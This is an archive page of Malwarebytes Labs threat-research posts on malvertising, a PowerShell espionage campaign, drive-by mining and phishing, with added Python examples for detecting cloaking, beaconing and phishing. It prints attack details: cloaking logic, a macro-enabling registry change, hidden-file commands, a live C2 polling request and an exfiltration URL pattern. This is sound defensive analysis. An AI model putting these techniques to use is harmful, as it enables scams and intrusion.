Browsing articles in "Internet Security"
Sep 28, 2017

Tech support scammers abuse native ad and content provider Taboola to serve malvertising

A large number of publishers – big and small – are monetizing their sites by selling space for companies that provide so-called native advertising, cited as more effective and engaging than traditional banner ads.

Indeed, on a news or entertainment site, users are more inclined to click on links and articles thinking that they are one and the same, not realizing that those are actually ‘sponsored’ and tied to various third-party providers.

Rogue advertisers have realized this unique opportunity to redirect genuine traffic towards their own infrastructure where they can subject their audience to whatever content they wish.

Case in point, we caught this malvertising incident on MSN, the Microsoft web portal that attracts millions of unique visitors. When we clicked on a story promoted by Taboola – a leading global content discovery platform with which Microsoft signed a deal in 2016 – we were redirected to a tech support scam page. The warning claims that our computer has crashed and that we must call a number for immediate assistance.

Figure 1: Automatic redirection from click on promoted story to scam page

The fraudulent page cannot be closed normally because it uses code that repeats the warning indefinitely. Unfortunately, this is enough to scare many folks and trick them into calling what they think is Microsoft support. Instead, they will be dealing with fake technicians whose goal is to extort hundreds of dollars from them.

Decoy news page hides real intentions

Rogue actors typically start creating content just like any other advertiser would and build up a profile. After all, they want to appear genuine in order to game the system with ‘hot’ content.

What’s determined as hot can be derived from real or shocking news. The point is to do a little bit of market study on what the most searched for stories or keywords are in order to attract traffic.

In this malvertising example, if we review the sequence of events, we realize that the scammer created a bogus news site (infinitymedia[.]online) which does have actual content but is performing conditional redirects, also known as ‘cloaking’.

Figure 2: Traffic view showing temporary hop via decoy news site

A conditional redirect is usually a server-side mechanism that profiles the user and returns a particular response. For instance, if the server determines that a bot or crawler is making a request, it may in turn either deny it or simply serve the expected content (decoy). Similarly, if the user is running Internet Explorer, is from North America and their IP address appears to have hit the server for the first time, they may receive a scammy page instead.

The point is that it’s trivial to play a Dr. Jekyll and Mr. Hyde kind of game and serve the content you want. The fraudulent advertiser did create various pages with impactful keywords (potentially for Search Engine Optimization purposes) and can also use those stories as a decoy:
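Here is the cloaking decision described above, together with the multi-profile probe an analyst uses to expose it, as an added Python example that is not code from the post, from Taboola or from the advertiser. The geo lookup, the fetch callable and the addresses are assumptions; a real probe makes actual HTTP requests with those User-Agents from exit nodes in the relevant countries. The second helper shows the practical catch: because the server only redirects a first-time IP, re-fetching from the same address to "confirm" the redirect returns the decoy.

```python
"""Server-side cloaking as the post describes it, plus a probe that exposes it.
Added example; not code from the post, Taboola or the advertiser."""
import re
from dataclasses import dataclass, field
from typing import Callable, Dict, List, Set, Tuple

Response = Tuple[int, str]                      # (HTTP status, body label or Location)
Fetcher = Callable[[str, str, str], Response]   # fetch(user_agent, country, source_ip)

BOT_UA = re.compile(r"bot|crawl|spider|curl|python-requests", re.I)
IE_UA = re.compile(r"MSIE|Trident/", re.I)
NORTH_AMERICA = {"US", "CA", "MX"}    # stands in for a geo-IP lookup (assumption)


@dataclass
class Cloaker:
    """Decision logic modelled on the post: crawlers and repeat visitors get the
    decoy article; a first-time Internet Explorer visitor from North America
    gets a 302 to the scam page."""
    scam_url: str
    seen_ips: Set[str] = field(default_factory=set)

    def respond(self, user_agent: str, country: str, source_ip: str) -> Response:
        first_visit = source_ip not in self.seen_ips
        self.seen_ips.add(source_ip)
        if BOT_UA.search(user_agent):
            return 200, "decoy-article"        # what a crawler or scanner sees
        if IE_UA.search(user_agent) and country in NORTH_AMERICA and first_visit:
            return 302, self.scam_url          # what the targeted victim sees
        return 200, "decoy-article"


# Visitor profiles an analyst would try. Each one uses its own source address
# because the first-visit check makes a second request from the same IP useless.
PROFILES: List[Tuple[str, str, str, str]] = [
    ("crawler", "Mozilla/5.0 (compatible; Googlebot/2.1)", "US", "198.51.100.10"),
    ("ie11-us", "Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko", "US", "198.51.100.11"),
    ("chrome-us", "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 Chrome/61.0 Safari/537.36", "US", "198.51.100.12"),
    ("ie11-de", "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko", "DE", "198.51.100.13"),
]


def probe(fetch: Fetcher, profiles: List[Tuple[str, str, str, str]] = PROFILES) -> Tuple[Dict[str, Response], bool]:
    """Request the same URL under every profile. `fetch` abstracts the HTTP
    request (in practice a real request with that User-Agent from an exit node
    in that country). Divergent responses are the signature of cloaking."""
    results = {name: fetch(ua, country, ip) for name, ua, country, ip in profiles}
    return results, len(set(results.values())) > 1


def repeat_request_is_burned(fetch: Fetcher, source_ip: str = "203.0.113.7") -> bool:
    """Shows the one-shot behaviour: re-fetching from the same address to
    'confirm' the redirect gets the decoy instead, so capture the first hit."""
    _, ua, country, _ = PROFILES[1]
    first = fetch(ua, country, source_ip)
    second = fetch(ua, country, source_ip)
    return first[0] == 302 and second[0] == 200


if __name__ == "__main__":
    site = Cloaker(scam_url="http://4vxadfcjdgbcmn[.]ga/")
    results, cloaked = probe(site.respond)
    for name, (status, target) in results.items():
        print(f"{name:10} -> {status} {target}")
    print("cloaking detected:", cloaked)
    print("same-IP retry burned:", repeat_request_is_burned(Cloaker(scam_url="x").respond))
```

Run against a live suspect URL, the only change needed is a `fetch` that performs the request and returns the status plus either a hash of the body or the Location header; keep the source addresses distinct across profiles, and archive the first response, since you will not get it twice.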

Figure 3: Stories designed for click-bait

To get back to this malvertising incident on MSN, the user was conditionally redirected to another site (the tech support scam page), and never saw the content they were looking for.

Figure 4: The 302 redirect call from the fake news site to the scam page

To show that this was no mere ‘coincidence’, we can look at the ownership of the ‘news’ site (infinitymedia[.]online) and see how it links to the tech support domain name (4vxadfcjdgbcmn[.]ga). A WHOIS lookup for infinitymedia[.]online returns the following information:

Creation Date: 2017-05-23T05:14:50.0Z
Registrar: PDR Ltd. d/b/a
Registrant Name: bhanu
Registrant Country: IN
Registrant Email:

A cursory review using RiskIQ’s PassiveTotal of domains recently created with the same email address shows a tendency for this actor to register tech support scam domains:

Figure 5: Domains recently registered by the actor behind the decoys news sites

Still, we do not have a clear connection to 4vxadfcjdgbcmn[.]ga, which has no identifiable registrant. Indeed, the .GA top-level domain (TLD) offers free domain names, and their registrant of record is… Gabon TLD B.V.

However, this particular actor made the mistake of reusing the same hosting server for domains he had created before. For example, micro-soft-system-alert2[.]online, which is registered to his email address, resolves to a server full of tech support scam and phishing sites, including the one used in this particular malvertising attack, namely 4vxadfcjdgbcmn[.]ga.

Figure 7: Connecting the fake news sites to the tech support domain

Further inspection of other properties hosted on that same server shows similar bogus ‘news’ sites:


There is no doubt that this actor has very clear intentions and has turned high-profile stories into a click-bait lead generation tool for tech support scams.

Banner ads versus native advertising

Banner ads can load third-party tags that are laced with malicious content, not to mention promoting anything that is outrageous (regardless of whether it has anything to do with the current content) and is bound to get clicks. For instance, there have been many documented instances of fake celebrity deaths used for click bait purposes on Facebook.

But promoted stories aren’t necessarily that different (or safer) when they take the user to a third-party website that is in the complete control of an advertiser, good or bad.

Users should be aware that even on a trusted platform, they should watch what they click on and be careful of sensationalist stories that may be used as click bait.

We reported the fraudulent advertiser to Taboola which told us they had opened an internal review of this particular vendor. We reached back with more questions regarding how Taboola deals with click bait and fake news, whether they scan articles for malware or scams, and finally if they had a direct point of contact to report security-related issues. However, we only received a response for the fake news problem, which you can read more about here.

The post Tech support scammers abuse native ad and content provider Taboola to serve malvertising appeared first on Malwarebytes Labs.

Powered by WPeMatico

Sep 28, 2017

Elaborate scripting-fu used in espionage attack against Saudi Arabia Government entity

This post was co-authored by David Sánchez and Jérôme Segura

We recently came across a campaign targeting a Saudi Arabia Government entity via a malicious Word document which at first reminded us of an attack we had previously described on this blog.

In our previous research, we detailed how an information stealer Trojan was deployed via a Word macro, in order to spy on its victims (various parts of the Saudi Government). The stolen information was transmitted back to the threat actors’ infrastructure in an encrypted format.

This new threat also uses a macro to infect the target’s computer, but rather than retrieving a binary payload, it relies on various scripts to maintain its presence and to communicate via hacked websites, acting as proxies for the command and control server.

The malicious script fingerprints the victim’s machine and can receive any command that will run via PowerShell. In this blog post, we will describe the way this threat enters the system and maintains its presence while constantly communicating with its command and control server.

Covert delivery and persistence

The decoy document bears the logo of one of the branches of the Saudi Government and prompts the user to “Enable Content” stating that the document is in protected view (which is actually true).

A high-level summary static analysis of this document reveals that it includes a macro as well as several Base64 encoded strings.

OLE:MAS--B-- target.doc
(Flags: M=Macros, A=Auto-executable, S=Suspicious keywords, B=Base64 strings)

One of the first things the macro does is lower the security settings of Microsoft Word and Excel by writing a value of “1” (Enable All macros) to the corresponding registry keys: the VBAWarnings value under each application’s Security key. Any macro-laden document opened afterwards then runs without a prompt.

The macro also collects the victim’s IP address by querying the Win32_NetworkAdapterConfiguration WMI class:

It then proceeds to retrieve a stream of data from the Pastebin website using its own proxy:

The data is converted into two scripts, a PowerShell and a Visual Basic one, the latter being used for persistence on the infected machine via two different hook points: a Run key in the registry and a scheduled task.

This VBScript is really a launcher for the more important PowerShell script, and both are stored as hidden system files under the Documents folder using the following commands:

attrib +s +h "C:\Users\public\documents\NTSTATS.ps1"
attrib +s +h "C:\Users\public\documents\NTSTATS.vbs"

Espionage and exfiltration

That PowerShell script carries the same instructions to lower Office’s security settings, but more importantly it is used to exfiltrate data and communicate with the command and control server.

A unique ID is stored on the victim’s machine (in the same folder as the scripts) in a file called [username].key and is used to receive instructions via a server located in Germany (although it appears to be down at the time of writing).

GET http://144.76.109[.]88/al/?action=getCommand&id=[user ID] HTTP/1.1

A function called getKey retrieves the unique ID from the .key file stored on the local hard drive to register the machine as a new victim. If the key file does not exist, it queries for additional system information (computer name, IP address, OS version) and then creates that key (Set-Content $keypath $id).

Another function called getCommand uses the key as a parameter to then contact the C2. This command runs every 5 minutes:

while ($true){
 getCommand $key
 start-sleep -Seconds 300
}

The malicious script can receive and run any command the attackers want via PowerShell, making this a very powerful attack.

The eventual exfiltration of data is done via several hardcoded websites acting as a proxy via the sendResult function:

The transmission of data is done via Base64 encoded strings, one for the user id (.key file) and one for the exfiltrated data.

GET /wp-content/wp_fast_cache/[removed]== HTTP/1.1
Connection: Keep-Alive

The parameters passed on the URL in the Base64 format:


Decoding the value in the variable “res”, we get the following information:

Connection-specific DNS Suffix . : [removed]
Description . . . . . . . . . . . : [removed]
Physical Address. . . . . . . . . : [removed]
DHCP Enabled. . . . . . . . . . . : [removed]
Autoconfiguration Enabled . . . . : [removed]
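Both the five-minute getCommand loop and the Base64-encoded GET to the wp_fast_cache path leave a distinctive trail in proxy logs. The following Python is an added example, not part of the post and not Malwarebytes code: it flags clients that poll one URL shape at a near-constant interval, and it decodes the Base64 path segment of the exfiltration request. The log format, the sample lines and the assumed “id=…&res=…” layout of the blob are constructions for the example; the post only says that two Base64 values (the user ID and the data) are carried in the URL and that the data sits in a variable called res.

```python
"""Hunting the beacon and the exfiltration path described above in proxy logs.
Added example (not from the post or Malwarebytes); the log format and the
layout of the Base64 blob are assumptions, see the comments."""
import base64
import re
import statistics
from collections import defaultdict
from datetime import datetime
from typing import Dict, List, Tuple
from urllib.parse import parse_qsl, urlsplit

Event = Tuple[datetime, str, str, str, int]   # (time, client, method, url, status)

# --- constructed sample data -------------------------------------------------
VICTIM_KEY = "4f2a1c"                          # contents of [username].key, made up
IPCONFIG = ("Connection-specific DNS Suffix . : corp.example\n"
            "Description . . . . . . . . . . . : Intel(R) 82574L\n"
            "Physical Address. . . . . . . . . : 00-0C-29-AA-BB-CC\n")


def _b64(s: str) -> str:
    return base64.urlsafe_b64encode(s.encode()).decode()


# Assumed layout: the path segment is Base64 of "id=<key>&res=<Base64 data>",
# matching the two encoded values and the "res" variable the post mentions.
_BLOB = _b64(f"id={VICTIM_KEY}&res={_b64(IPCONFIG)}")

# Log format assumed: "<ISO time> <client ip> <method> <url> <status>".
# 10.0.0.5 polls the C2 every 300 s; the last line carries the exfil blob.
SAMPLE_LOG = f"""\
2017-09-20T10:00:01Z 10.0.0.5 GET http://144.76.109.88/al/?action=getCommand&id={VICTIM_KEY} 200
2017-09-20T10:02:30Z 10.0.0.9 GET http://example.com/news/ 200
2017-09-20T10:05:01Z 10.0.0.5 GET http://144.76.109.88/al/?action=getCommand&id={VICTIM_KEY} 200
2017-09-20T10:10:02Z 10.0.0.5 GET http://144.76.109.88/al/?action=getCommand&id={VICTIM_KEY} 200
2017-09-20T10:15:01Z 10.0.0.5 GET http://144.76.109.88/al/?action=getCommand&id={VICTIM_KEY} 200
2017-09-20T10:15:03Z 10.0.0.5 GET http://compromised-blog.example/wp-content/wp_fast_cache/{_BLOB} 200
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\d+)$")


def parse(log: str) -> List[Event]:
    events = []
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(m.group(1), "%Y-%m-%dT%H:%M:%SZ")
            events.append((ts, m.group(2), m.group(3), m.group(4), int(m.group(5))))
    return events


def find_beacons(events: List[Event], min_hits: int = 3, max_jitter: float = 0.05) -> Dict[Tuple[str, str], float]:
    """Group requests by client and URL shape (query *keys* only, since the id
    value is per victim) and report groups whose inter-arrival time is nearly
    constant: a sleep(300) loop shows up as a 300 s period with tiny jitter."""
    groups: Dict[Tuple[str, str], List[datetime]] = defaultdict(list)
    for ts, client, _method, url, _status in events:
        u = urlsplit(url)
        keys = ",".join(sorted(k for k, _ in parse_qsl(u.query)))
        groups[(client, f"{u.scheme}://{u.netloc}{u.path}?{keys}")].append(ts)
    beacons: Dict[Tuple[str, str], float] = {}
    for key, stamps in groups.items():
        if len(stamps) < min_hits:
            continue
        stamps.sort()
        deltas = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        period = statistics.median(deltas)
        if period > 0 and max(abs(d - period) for d in deltas) / period <= max_jitter:
            beacons[key] = period
    return beacons


EXFIL_RE = re.compile(r"/wp-content/wp_fast_cache/([A-Za-z0-9+/=_-]+)$")


def b64_lenient(s: str) -> bytes:
    """Decode standard or URL-safe Base64 with missing padding restored."""
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def decode_exfil(events: List[Event]) -> List[Tuple[str, Dict[str, str]]]:
    """Decode the Base64 path segment of requests to the proxy path the post
    shows, then decode the inner 'res' value (assumed layout, see above).
    The query-ish string is split by hand so '+' inside Base64 survives."""
    found = []
    for _ts, client, _method, url, _status in events:
        m = EXFIL_RE.search(urlsplit(url).path)
        if not m:
            continue
        outer = b64_lenient(m.group(1)).decode("utf-8", "replace")
        fields = dict(p.split("=", 1) for p in outer.split("&") if "=" in p) or {"raw": outer}
        if "res" in fields:
            fields["res"] = b64_lenient(fields["res"]).decode("utf-8", "replace")
        found.append((client, fields))
    return found


if __name__ == "__main__":
    evs = parse(SAMPLE_LOG)
    for (client, shape), period in find_beacons(evs).items():
        print(f"beacon: {client} -> {shape} every {period:.0f}s")
    for client, fields in decode_exfil(evs):
        print(f"exfil from {client}: id={fields.get('id')}\n{fields.get('res')}")
```

The periodicity check is deliberately keyed on the URL shape rather than the C2 address: the post notes the server was already down, and the proxies are ordinary hacked WordPress sites, so the stable signal is a host polling the same path at a fixed interval, not a particular IP.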

Script based attack and protection

This attack is very different from the typical malicious spam we see on a daily basis, blasting Locky or some banking Trojan. Indeed, there is no malicious binary payload (although one could be downloaded on instruction from the C2), which makes us think the attackers are trying to keep a low profile and remain on the system while collecting information from their target.

Relying on scripts as part of the attack chain and ongoing infection is an interesting concept due to how modular it is, not to mention more likely to stay undetected by antivirus engines. At the same time, it needs to rely on various encoding techniques because it can’t make use of a packer like a traditional malware binary would.

Malwarebytes users are already protected against this attack thanks to our signature-less engine.

Indicators of compromise







The post Elaborate scripting-fu used in espionage attack against Saudi Arabia Government entity appeared first on Malwarebytes Labs.


Sep 26, 2017

Keychain vulnerability in macOS

On Monday, Patrick Wardle, a respected security researcher at Synack and owner of Objective-See, sent a tweet about a keychain vulnerability he had found in macOS High Sierra. As his tweet showed, it is possible for a malicious app to extract, and then exfiltrate, keychain data from High Sierra, with passwords clearly exposed in plain text.

In response to some questions, Wardle has also posted some additional information in an FAQ on Patreon.

This announcement set off a firestorm of articles on a variety of sites, which unfortunately caused a lot of FUD (fear, uncertainty, and doubt). In at least one case, I saw an article saying to hold off on installing High Sierra until this bug is fixed. It seems that many of these articles were written based solely on the contents of that tweet, but there is much more to be said.

It’s important to understand that the idea that people should wait to install High Sierra because of this bug is a very bad one, for multiple reasons.

First, as Wardle points out in his FAQ, this bug also affects Sierra and probably affects El Capitan as well. For all we know, it may go back further than that… only testing older systems can say for sure. So, you’ve probably got the vulnerability already anyway, whether you upgrade to High Sierra or not.

Second, installing updates and upgrades is an extremely important thing to do to keep yourself secure. If you don’t update, you don’t get important security fixes. If you skip upgrading to High Sierra because of one vulnerability (which you’re already vulnerable to anyway), that may mean that you will continue to be vulnerable to other issues that may have been fixed in High Sierra, but not in Sierra.

Keep in mind that the Mac fix for the extremely serious Broadpwn vulnerability was, apparently, only applied to macOS Sierra 10.12.6. So the old common knowledge that Mac security fixes go into the last three systems (El Capitan, Sierra, and High Sierra) does not seem to still be true, if it ever really was.

Third, let’s pretend for a moment that this was a vulnerability only affecting High Sierra. If you skip High Sierra, that implies that you think doing so makes you safe from keychain theft. Think again.

Consider, for example, the issue described in a blog post by Brenton Henry, in which a combination of an Apple tool and an AppleScript could be used to extract the contents of the keychain. That issue exists on older systems, but not Sierra or High Sierra.

Not only is the issue described by Henry a vulnerability that still exists on older systems, it’s a known vulnerability. That means that any script kiddie capable of doing a Google search would be able to implement it; it’s not that hard to do. Nobody knows yet how the vulnerability found by Wardle works, only that it exists.

As another example, think about the compromise of the HandBrake app in May, which led to systems being infected with the Proton malware. In that case, Proton was able to successfully trick the user into providing their password, and then exfiltrated that and their keychain files (among other things), which could be unlocked using that same password in most cases.

There was also the case of an interesting sample of the Dok malware one of our researchers received in a junk e-mail, which used an open-source Python remote access tool (RAT) that had the capability to exfiltrate the keychain and convincingly phish a user’s password.

These last two examples would work on any system, including High Sierra since they involve theft of both the user’s password and the keychain files.

Don’t get me wrong, this is a very bad vulnerability, and Apple should fix it as soon as possible. However, it’s not a world-ending catastrophe, nor is it a good reason to avoid installing High Sierra. There will always be vulnerabilities. Keeping your system and your software up-to-date is one of the best ways you can cope with them.

The post Keychain vulnerability in macOS appeared first on Malwarebytes Labs.


Sep 25, 2017

Drive-by mining and ads: The Wild Wild West

There seems to be a trend lately for publishers to monetize their traffic by having their visitors mine for cryptocurrencies while on their site. The idea is that you are accessing content for free and in exchange, your computer (its CPU in particular) will be used for mining purposes.

The Pirate Bay started to run a miner on its site and later publicly acknowledged it. In other cases, the mining was a byproduct of malicious adverts, or was done via legitimate but compromised websites that had cryptomining code injected into them directly.

Needless to say, this practice is raising many eyebrows and not everyone is on the same page about whether this new business model could be a long-term replacement for ads (although most people agree that ads are often annoying and malicious).

But what exactly happens when publishers turn your PC into a miner and display ads at the same time? In this post, we take a look at what is arguably a bad mix.

Drive-by mining

Because mining happens in the browser via JavaScript without user interaction, we could compare it to drive-by downloads. As publishers need to retain the visitor’s attention so that the JavaScript code runs uninterrupted for as long as possible, this is where the type of content matters. We know that for example gaming or video streaming sites tend to keep people on their page much longer than others.

Figure 1: A streaming site that is (not so) silently mining cryptocurrency

There is one exception: in some cases, loading the JavaScript mining code once is enough, and the mining continues even after the user navigates to another site. This particular abuse technique affects Internet Explorer (the so-called ‘zombie script’) and was identified and reported (but not fixed yet) by Manuel Caballero.

This concept of mining digital currency via the browser is a little odd at first because it is well known how resource intensive mining can be, requiring powerful machines loaded with expensive hardware. While this is true for Bitcoin, it is not for other currencies that were designed for ordinary CPUs.

Take the Monero digital currency, powered by the CryptoNight algorithm, which can be mined with a standard CPU with little difference in overall results compared to running more advanced hardware. This literally opens the door to a large and still mostly untapped market comprised of millions of typical consumer machines.

Coinhive advertises itself as “A Crypto Miner for your Website” and enables website owners to quickly set up mining by using their JavaScript API. Without a doubt, it has gained very rapid adoption but unfortunately is already being abused.

Figure 2: JavaScript API/code from Coinhive on the client side used to mine cryptocurrency

Gaming and video sites typically are more resource intensive, so it seems to make little sense to run a miner at the same time without a noticeable impact. Having said that, many people who consume copyrighted content are perhaps less likely to complain about an under par user experience.

The question at this point is: How far can publishers push the limits towards a really bad user experience? You may be surprised that for many, this is not really a problem at all and that double dipping is, in fact, a fairly common practice.

Forced mining and malvertising

The same site pictured above was not only monetizing via Coinhive, but they also ran adverts. Clicking anywhere on the page – including the ‘Play’ button on the video – triggered a pop under advert that ran through various ad exchanges and resulted in malvertising in almost all instances, leading to tech support scams and several different exploit kit infection chains.

Tech support scams

Tech support scams are one of the most common redirections we see these days. While they do not usually infect your computer, they are still a threat to consider. The most common symptom is referred to as ‘Browlock’ because scammers use code that prevents you from normally closing your browser. The claims are always excessive and designed to scare users about made-up infections. Victims who call the posted number for help end up with more computer issues and several hundred dollars less in their wallet.

Figure 3: Malvertising leading to tech support scam (Browlock) is triggered when clicking anywhere on the page

Figure 4: Web traffic showing redirection sequence from publisher to tech support scam page

RIG exploit kit

RIG is the most popular exploit kit these days and malvertising is its prime delivery mechanism. Victims are filtered using the same tools that marketers have to profile consumers, and there can be a secondary level of filtering, usually via a gate that performs geolocation checks for example.

Figure 5: RIG EK via malvertising chain

Terror exploit kit

Terror EK is on a much smaller distribution scale than RIG but is still a fairly active exploit kit that tries out different things. For instance, some Terror EK infection chains are served over HTTPS (using free certificates from Let’s Encrypt), which keeps the landing page and payload out of reach of network inspection that only sees plaintext HTTP. It also has an interesting gate with one of the most convoluted iframe encodings we have seen.

Figure 6: Terror EK via malvertising, and gate before landing page

Block less or more?

One of the first reactions to the rise of browser cryptominers was to ask how to block them, whether with a typical ad blocker or URL/IP blacklist and even by disabling JavaScript. There’s no question that users are annoyed by a rollout that did not include their opinion, even though many were actually favorable to this alternate solution to online ads.

While cryptominers do have an impact on system resources, there was at least a sense that they may be safer and less intrusive than ads. But publishers ought to be more transparent with their audience because no-one likes unannounced guests. Unfortunately, there will always be publishers that care very little about what kind of traffic they push, so long as it generates good revenues; for those, cryptominers are just an added income to their existing advertising portfolio.

Malwarebytes users are already protected against this drive-by mining. In fact, we are blocking over 5 million connection attempts to Coinhive every single day, which shows that browser-based mining has really taken off in a big way.

Our goal is to protect people from unsolicited drive-by cryptomining. However, for those users that are aware and want to participate in mining, they can absolutely do so by adding an exclusion for this domain.

Indicators of compromise

Tech support scam



Fobos: hudsonentertainment[.]info/
Fobos: 204hdchdhhh[.]cf/tako/?re=6128546021
RIG IP: 188.225.83[.]85

Terror EK


The post Drive-by mining and ads: The Wild Wild West appeared first on Malwarebytes Labs.


Sep 25, 2017

A week in security (September 18 – September 24)

Last week, we kept you updated on our blog about the infected versions of CCleaner that were offered as downloads on the official servers.

We also warned you against a fake IRS notice that delivers a customized spying tool, some of the threats currently facing gamers, and a Netflix scam that has been doing the rounds in Europe.

Mac users learned how to tell if their Mac is infected and Advanced Tech Support victims learned how to apply for a (partial) refund.


Consumer news

Business news


Stay safe!

Malwarebytes Labs Team

The post A week in security (September 18 – September 24) appeared first on Malwarebytes Labs.


Sep 22, 2017

Netflix scam warning

Always be on your toes

While we are used to receiving scam attempts pretending to be from banks, online shops, credit card companies, and international courier services, that does not mean all other emails are safe. Far from it. To demonstrate this point we will show you a scam aimed at Netflix customers which has been used in the Netherlands and is now doing the rounds in the UK but could just as easily spread to the US.

The mail in question

The sender address, in this case, was supportnetflix@checkinformation[.]com and the content of the email informs us that there has been a problem with our last payment. Obviously to those of us who are not customers of Netflix this is the first red flag. The fact that the domain name checkinformation[.]com does not belong to Netflix is another big red flag. In fact, the domain is for sale at the moment of writing.

phishing mail


Account disabled!

Dear User,

We’re having some trouble with your current billing information. We’ll try again. But in the meantime you may want to update your payment details. During the next login process, you will be required to provide some informations like (billing info, phone number, payment info)


So the email asks us to fill out our payment details on a site. This should always be a red flag for everyone. A security-aware company does not provide you with a clickable button to their site. They will tell you to log into their site and provide you with instructions on how to proceed. They will not provide a direct link to a page with a form to fill out asking for billing information and what not.

Pay attention to

When you have to provide such details always look for the green padlock in the address bar of your browser.

green padlock

Remember that the green padlock is not the sole condition, but it is a must before you proceed. The padlock only means that your connection to the domain shown in the address bar is encrypted; it says nothing about who owns that domain, and phishing sites obtain free certificates just as easily as legitimate ones, so check that the domain itself is the real one.

Another telltale sign is spelling errors, but again, the lack of them is not a definite green light to proceed. Scammers have learned that their efficiency goes up if they pay attention to their spelling.

Also never judge a site by its looks, because phishers are masters in the art of copying the layout and images from legitimate sites. In fact, they usually link to the actual layout and images of the website they are pretending to be.
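The checks in this section (does the sender domain belong to the brand, where do the links really go, are the brand’s own images hotlinked into a page that leads elsewhere) turned into a small triage script, as an added Python example that is not from the post. The message below is a constructed stand-in for the one described (only the sender address is the one quoted above); the brand domain list and the two-label “registrable domain” shortcut are assumptions.

```python
"""The red flags from this section turned into a triage script. Added example,
not from the post; the message, the brand-domain list and the two-label
"registrable domain" shortcut are assumptions."""
import re
from email import message_from_string, policy
from email.utils import parseaddr
from typing import Dict, List
from urllib.parse import urlsplit

BRAND = "netflix"
BRAND_DOMAINS = {"netflix.com"}         # domains the brand really uses (assumed list)

HREF_RE = re.compile(r'href\s*=\s*["\']([^"\']+)["\']', re.I)
SRC_RE = re.compile(r'src\s*=\s*["\']([^"\']+)["\']', re.I)

# Constructed message modelled on the one described above; the sender address
# is the one quoted in the post, everything else is made up.
SAMPLE_EML = """\
From: "Netflix Support" <supportnetflix@checkinformation.com>
To: victim@example.org
Subject: Account disabled!
Content-Type: text/html; charset="utf-8"

<html><body>
<img src="https://www.netflix.com/img/logo.png">
<p>We're having some trouble with your current billing information.</p>
<a href="http://netflix-billing-update.example/login">Update payment details</a>
<a href="https://help.netflix.com/">Help Center</a>
</body></html>
"""


def registrable(host: str) -> str:
    """Last two labels of a hostname. Simplification: production code should use
    the public suffix list so that hosts like example.co.uk are handled."""
    return ".".join(host.lower().rstrip(".").split(".")[-2:])


def triage(raw: str) -> Dict[str, object]:
    msg = message_from_string(raw, policy=policy.default)
    _, addr = parseaddr(str(msg["From"] or ""))
    sender_domain = addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""
    part = msg.get_body(preferencelist=("html", "plain"))
    html = part.get_content() if part is not None else ""

    link_hosts = {urlsplit(u).hostname or "" for u in HREF_RE.findall(html)}
    image_hosts = {urlsplit(u).hostname or "" for u in SRC_RE.findall(html)}
    off_brand_links = sorted(h for h in link_hosts if h and registrable(h) not in BRAND_DOMAINS)
    brand_images = sorted(h for h in image_hosts if h and registrable(h) in BRAND_DOMAINS)
    sender_is_brand = registrable(sender_domain) in BRAND_DOMAINS

    flags: List[str] = []
    if not sender_is_brand:
        flags.append(f"sender domain {sender_domain or '(none)'} is not a brand domain")
    for host in off_brand_links:
        kind = "lookalike link host" if BRAND in host else "link to unrelated host"
        flags.append(f"{kind} {host}")
    if off_brand_links and brand_images:
        # The post's point: phishers hotlink the real site's images to copy its look.
        flags.append("brand images hotlinked next to off-brand links (cloned template)")
    return {
        "sender_domain": sender_domain,
        "sender_is_brand": sender_is_brand,
        "off_brand_links": off_brand_links,
        "brand_images": brand_images,
        "flags": flags,
        "verdict": "suspicious" if flags else "no obvious red flags",
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_EML).items():
        print(f"{key}: {value}")
```

The script deliberately does not trust the display name or the page’s appearance, only the domains: the From display name and the HTML are whatever the sender chose, while the registrable domain of the sender address and of each link is what the user would actually be talking to.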


The Guardian: Watch out for Netflix email scam that looks like the real deal

In January another Netflix scam was analyzed by FireEye.

Guideline to help determine whether a website is legitimate.


Pieter Arntz

The post Netflix scam warning appeared first on Malwarebytes Labs.


Sep 21, 2017

Don’t let these gaming threats give you a Game Over

With EGX, the biggest gaming event in the UK opening its doors today, we thought it’d be timely to remind you of some of the threats currently facing gamers. No matter what type of game, client, or system you use, there’s always something waiting to try and give you a bad day where the safety of your account is concerned.

GTAV cash generators

Some games, like GTAV, involve an amount of “grinding” (performing potentially repetitive tasks) to get what you want. In this case, incredibly expensive items/additional content which are free to download, but cost in-game money to make use of. In GTAV, you can buy in-game currency with real money to speed up the process, grind, or turn to the internet in search of free money tools. While modders in game sessions can – and do – spawn money from the sky, or only add cash to your account, the huge pile of YouTube videos and web comments claiming to offer free services online are all fake. The so-called money generators are merely survey scams, which lead to requests for personal information or downloadable files (which may or may not be malicious).


gta fake

Steam scams

These are very popular, especially with accounts being able to buy and sell (expensive) digital items for various titles, adding extra desirability to scammers wanting to make a quick buck. Phishing is a mainstay of Steam scams; other attacks, such as swiping a Steam SSFN file to bypass Steam Guard are much more sophisticated. Be wary of fake item trades, especially if they don’t lead to an official Steam URL – you may well be looking at a static phishing page, or one which scrapes some elements from the real thing to appear legitimate.

steam uploader

Read: Something’s phishy: How to detect phishing attempts


Swatting

The act of sending armed law enforcement round to a game streamer’s house, which could potentially be fatal. Streamers usually get caught out by being too open with their personal information – quite often, you’ll find out all you need to know about a target simply by listening to them stream. Before you know it, they’ll have casually mentioned locations, even nearby streets where their friends live, and much more besides. Calls to said friends pretending to be someone else, for example, will fill in the missing pieces of the puzzle.

Ironically, the main way to avoid swatting (for the most part) is to tell people who make a living out of talking to stop talking about themselves (just a little bit). This is no guarantee of safety; many other ways exist to obtain a home address via publicly available information. All in all, streaming is a bit of a dangerous pastime.

Game company hacks

There’s not a huge amount you can do when the gatekeepers of your data get popped, but that doesn’t mean you should be complacent. Many game companies and hardware makers now offer additional forms of security such as key fobs and two-factor authentication, which you should make use of whenever possible. You may also wish to use a password manager to ensure you’re not just reusing the same passwords everywhere, which could lead to additional compromises. Modern gaming can require multiple passwords across different gaming platforms just to play one game, so it’s fairly common to see video game password burnout – don’t fall for it!

Fake emulators

